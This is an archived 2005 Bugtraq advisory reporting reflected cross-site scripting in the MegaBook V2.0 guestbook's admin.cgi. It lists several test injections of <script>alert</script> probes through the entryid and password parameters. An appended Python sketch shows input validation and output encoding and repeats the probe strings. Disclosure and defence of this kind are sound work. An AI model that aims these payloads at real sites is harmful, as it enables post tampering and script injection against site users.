[38724] in bugtraq

MegaBook V2.0 - Cross Site Scripting Exploit

daemon@ATHENA.MIT.EDU (Spy Hat)
Thu May 5 14:00:48 2005

Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Spy Hat <spyhat@spyhat.com>
To: bugtraq@securityfocus.com



The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected script is admin.cgi.

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with these POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat
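
Added example, not part of the original post and not MegaBook's code: a Python sketch of the two server-side controls that neutralise the probes listed above, strict validation of entryid and output encoding of the reflected password value. The form template, the comment field and all function names are assumptions, since the post does not show where admin.cgi places the values in its response.

```python
import html
import re

# Probe values from the post (HTML entities decoded). Each tries to close a
# different surrounding context before opening a <script> element.
PROBES = [
    "<script>alert('wvs-xss-magic-string-188784308');</script>",
    "'><script>alert('wvs-xss-magic-string-486624156');</script>",
    "\"><script>alert('wvs-xss-magic-string-1852691616');</script>",
    "><script>alert('wvs-xss-magic-string-429380114');</script>",
    "</textarea><script>alert('wvs-xss-magic-string-723975367');</script>",
]
ENTRY_ID = re.compile(r"[0-9]{1,9}")
# Tags the hypothetical template itself writes; anything else came from input.
TEMPLATE_TAGS = re.compile(r"</?(form|input|textarea|p)\b[^<>]*>")


def parse_entry_id(raw):
    """Accept only a short decimal id; return None for anything else."""
    return int(raw) if ENTRY_ID.fullmatch(raw or "") else None


def render_modify_form(params, encode=True):
    """Hypothetical modifypost page; encode=False reproduces the reflection."""
    entry_id = parse_entry_id(params.get("entryid"))
    if entry_id is None:
        return "<p>Invalid entry id.</p>"  # the rejected value is never echoed
    # quote=True also encodes " and ', so a value cannot end its attribute.
    enc = (lambda v: html.escape(v, quote=True)) if encode else (lambda v: v)
    password = enc(params.get("password", ""))
    comment = enc(params.get("comment", ""))  # hypothetical textarea field
    return (
        '<form method="post" action="admin.cgi">\n'
        f'<input type="hidden" name="entryid" value="{entry_id}">\n'
        f'<input type="password" name="password" value="{password}">\n'
        f'<textarea name="comment">{comment}</textarea>\n'
        "</form>"
    )


def raw_markup_reaches_output(page):
    """True if any '<' remains outside the template's own tags."""
    return "<" in TEMPLATE_TAGS.sub("", page)
```

html.escape covers HTML text and quoted-attribute contexts only; a value written into a script block or a URL needs the encoder for that context.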
